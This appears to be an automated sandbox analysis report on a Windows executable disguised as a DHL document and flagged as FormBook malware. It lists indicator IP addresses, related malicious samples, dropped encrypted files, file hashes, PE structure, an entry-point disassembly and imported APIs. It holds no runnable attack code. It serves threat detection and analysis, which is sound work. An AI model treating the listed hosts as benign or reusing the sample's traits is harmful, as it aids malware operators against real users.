                                                                                  CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  Certificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  Certificate 20156-2024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110

                                                                                  ASNs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  POWERLINE-AS-APPOWERLINEDATACENTERHKDHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  nshsh4.elfGet hashmaliciousMiraiBrowse
                                                                                  • 156.251.3.5
                                                                                  i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                  • 156.251.7.145
                                                                                  armv4l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                  • 156.244.234.130
                                                                                  ex86.elfGet hashmaliciousMiraiBrowse
                                                                                  • 156.244.234.110
                                                                                  armv6l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                  • 156.242.206.57
                                                                                  mipsel.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                  • 156.251.7.126
                                                                                  ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                                                  • 156.251.17.224
                                                                                  PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                                  • 156.251.17.224
                                                                                  m68k.elfGet hashmaliciousMiraiBrowse
                                                                                  • 156.242.206.20
                                                                                  REGISTER-ASITDHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 195.110.124.133
                                                                                  SRT68.exeGet hashmaliciousFormBookBrowse
                                                                                  • 195.110.124.133
                                                                                  CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 195.110.124.133
                                                                                  ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • 195.110.124.133
                                                                                  Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                  • 195.110.124.133
                                                                                  Certificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                  • 195.110.124.133
                                                                                  DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • 195.110.124.133
                                                                                  ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • 195.110.124.133
                                                                                  S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • 195.110.124.133
                                                                                  Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                                  • 195.110.124.133
                                                                                  SEDO-ASDEDHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94
                                                                                  CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94
                                                                                  Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94
                                                                                  Certificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94
                                                                                  Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94
                                                                                  Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94
                                                                                  Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94
                                                                                  Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94
                                                                                  RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94
                                                                                  Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94

                                                                                  JA3 Fingerprints

                                                                                  No context

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  C:\Users\user\AppData\Local\Temp\F56GKLK7U4

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\netbtugc.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\aut10B2.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\DHL 40312052024.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):270848
                                                                                  Entropy (8bit):7.994602609396068
                                                                                  Encrypted:true
                                                                                  SSDEEP:6144:Fgw2Nz7AgbK8JRhWnBYH2/HH3PUn5FC393y6+m9cB:FgZzEgbNLk6H2PPc4Smq
                                                                                  MD5:8C8B3EACBFE6407219C6439CB689162D
                                                                                  SHA1:FAB193DAD466AB9B3B9D38D266745E36A254AFAB
                                                                                  SHA-256:72959DD2D29F1AFCC66783159E5E6B3F44A2CBFEDC6757C5F7B5AF24ADF4DA45
                                                                                  SHA-512:0F9F20A2BC5BBC31DA2C0D5E2DD72A88988F2F02E34904EA2187E8FEE557D1EF12B511155E3EFA2CBCA038AC5A2D66DFF1541035A13C984A91F32181F39A2EAA
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:.m.d.YZKO...H......Z4...qYC...XAT17Q02Z7E68YZKOM0XAT17Q02Z7E.8YZEP.>X.]...1~...^Q*z;="W* 9.T0^\5CeT]y(>!mY6a.~dq Rk;5S~KOM0XATH6X..:P..X>.v/*.B....1W.@....9=.U.}4V..YQ2.%Q.YZKOM0XA.t7Q|3[7.^..ZKOM0XAT.7S19[<E6(]ZKOM0XAT1.D02Z'E68y^KOMpXAD17Q22Z1E68YZKOK0XAT17Q0.^7E48YZKOM2X..17A02J7E68IZK_M0XAT1'Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT.C4HFZ7E.7]ZK_M0XQP17A02Z7E68YZKOM0XaT1WQ02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0X

                                                                                  C:\Users\user\AppData\Local\Temp\neophobic

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\DHL 40312052024.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):270848
                                                                                  Entropy (8bit):7.994602609396068
                                                                                  Encrypted:true
                                                                                  SSDEEP:6144:Fgw2Nz7AgbK8JRhWnBYH2/HH3PUn5FC393y6+m9cB:FgZzEgbNLk6H2PPc4Smq
                                                                                  MD5:8C8B3EACBFE6407219C6439CB689162D
                                                                                  SHA1:FAB193DAD466AB9B3B9D38D266745E36A254AFAB
                                                                                  SHA-256:72959DD2D29F1AFCC66783159E5E6B3F44A2CBFEDC6757C5F7B5AF24ADF4DA45
                                                                                  SHA-512:0F9F20A2BC5BBC31DA2C0D5E2DD72A88988F2F02E34904EA2187E8FEE557D1EF12B511155E3EFA2CBCA038AC5A2D66DFF1541035A13C984A91F32181F39A2EAA
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:.m.d.YZKO...H......Z4...qYC...XAT17Q02Z7E68YZKOM0XAT17Q02Z7E.8YZEP.>X.]...1~...^Q*z;="W* 9.T0^\5CeT]y(>!mY6a.~dq Rk;5S~KOM0XATH6X..:P..X>.v/*.B....1W.@....9=.U.}4V..YQ2.%Q.YZKOM0XA.t7Q|3[7.^..ZKOM0XAT.7S19[<E6(]ZKOM0XAT1.D02Z'E68y^KOMpXAD17Q22Z1E68YZKOK0XAT17Q0.^7E48YZKOM2X..17A02J7E68IZK_M0XAT1'Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT.C4HFZ7E.7]ZK_M0XQP17A02Z7E68YZKOM0XaT1WQ02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0XAT17Q02Z7E68YZKOM0X

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.184351810536893
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:DHL 40312052024.exe
                                                                                  File size:1'202'688 bytes
                                                                                  MD5:76d2944f234154fa8d4c251ec4c621be
                                                                                  SHA1:47879dc1ba25220085eddb2f8aa0b29369909bef
                                                                                  SHA256:c45d7adb88147a71f85263d1e1f3394cb3edb67b2659986a1c6785326d4357b0
                                                                                  SHA512:24f07adf4647e2f61a98de3d38c0a8898cd6fe415fb94e51d8e6021ca3ae9bbf5f6568089cde9b513539d16326a2c52e5ade13ddc73e937a5a3dd15aa48f231e
                                                                                  SSDEEP:24576:4u6J33O0c+JY5UZ+XC0kGso6FafWwXgV+pPCSxCKUzWY:yu0c++OCvkGs9FafpXgOPCSxCwY
                                                                                  TLSH:5045CF2273DDC360CB669173BF69B7016EBF7C210A30B95B2F980D7DA950162162D7A3
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                                                  File Icon

                                                                                  Icon Hash:aaf3e3e3938382a0

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x427dcd
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x6752F2D3 [Fri Dec 6 12:49:23 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:5
                                                                                  OS Version Minor:1
                                                                                  File Version Major:5
                                                                                  File Version Minor:1
                                                                                  Subsystem Version Major:5
                                                                                  Subsystem Version Minor:1
                                                                                  Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  call 00007FD394BAAF8Ah
                                                                                  jmp 00007FD394B9DD54h
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  push edi
                                                                                  push esi
                                                                                  mov esi, dword ptr [esp+10h]
                                                                                  mov ecx, dword ptr [esp+14h]
                                                                                  mov edi, dword ptr [esp+0Ch]
                                                                                  mov eax, ecx
                                                                                  mov edx, ecx
                                                                                  add eax, esi
                                                                                  cmp edi, esi
                                                                                  jbe 00007FD394B9DEDAh
                                                                                  cmp edi, eax
                                                                                  jc 00007FD394B9E23Eh
                                                                                  bt dword ptr [004C31FCh], 01h
                                                                                  jnc 00007FD394B9DED9h
                                                                                  rep movsb
                                                                                  jmp 00007FD394B9E1ECh
                                                                                  cmp ecx, 00000080h
                                                                                  jc 00007FD394B9E0A4h
                                                                                  mov eax, edi
                                                                                  xor eax, esi
                                                                                  test eax, 0000000Fh
                                                                                  jne 00007FD394B9DEE0h
                                                                                  bt dword ptr [004BE324h], 01h
                                                                                  jc 00007FD394B9E3B0h
                                                                                  bt dword ptr [004C31FCh], 00000000h
                                                                                  jnc 00007FD394B9E07Dh
                                                                                  test edi, 00000003h
                                                                                  jne 00007FD394B9E08Eh
                                                                                  test esi, 00000003h
                                                                                  jne 00007FD394B9E06Dh
                                                                                  bt edi, 02h
                                                                                  jnc 00007FD394B9DEDFh
                                                                                  mov eax, dword ptr [esi]
                                                                                  sub ecx, 04h
                                                                                  lea esi, dword ptr [esi+04h]
                                                                                  mov dword ptr [edi], eax
                                                                                  lea edi, dword ptr [edi+04h]
                                                                                  bt edi, 03h
                                                                                  jnc 00007FD394B9DEE3h
                                                                                  movq xmm1, qword ptr [esi]
                                                                                  sub ecx, 08h
                                                                                  lea esi, dword ptr [esi+08h]
                                                                                  movq qword ptr [edi], xmm1
                                                                                  lea edi, dword ptr [edi+08h]
                                                                                  test esi, 00000007h
                                                                                  je 00007FD394B9DF35h
                                                                                  bt esi, 03h
                                                                                  jnc 00007FD394B9DF88h

                                                                                  Rich Headers

                                                                                  Programming Language:
                                                                                  • [ASM] VS2013 build 21005
                                                                                  • [ C ] VS2013 build 21005
                                                                                  • [C++] VS2013 build 21005
                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                  • [ASM] VS2013 UPD4 build 31101
                                                                                  • [RES] VS2013 build 21005
                                                                                  • [LNK] VS2013 UPD4 build 31101

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x5d054.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1250000x711c.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rsrc0xc70000x5d0540x5d200a2416438971472fbd621088e629790fcFalse0.9289848993288591data7.897657104855963IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0x1250000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                  Resources

                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                  RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                  RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                  RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                  RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                  RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                  RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                  RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                  RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                  RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                  RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                  RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                                                  RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                  RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                                                  RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                  RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                  RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                  RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                  RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                  RT_RCDATA0xcf7b80x54319data1.0003363713075275
                                                                                  RT_GROUP_ICON0x123ad40x76dataEnglishGreat Britain0.6610169491525424
                                                                                  RT_GROUP_ICON0x123b4c0x14dataEnglishGreat Britain1.25
                                                                                  RT_GROUP_ICON0x123b600x14dataEnglishGreat Britain1.15
                                                                                  RT_GROUP_ICON0x123b740x14dataEnglishGreat Britain1.25
                                                                                  RT_VERSION0x123b880xdcdataEnglishGreat Britain0.6181818181818182
                                                                                  RT_MANIFEST0x123c640x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                                  Imports

                                                                                  DLLImport
                                                                                  WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                                  VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                  COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                  MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                  WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                  PSAPI.DLLGetProcessMemoryInfo
                                                                                  IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                  USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                  UxTheme.dllIsThemeActive
                                                                                  KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                                  USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
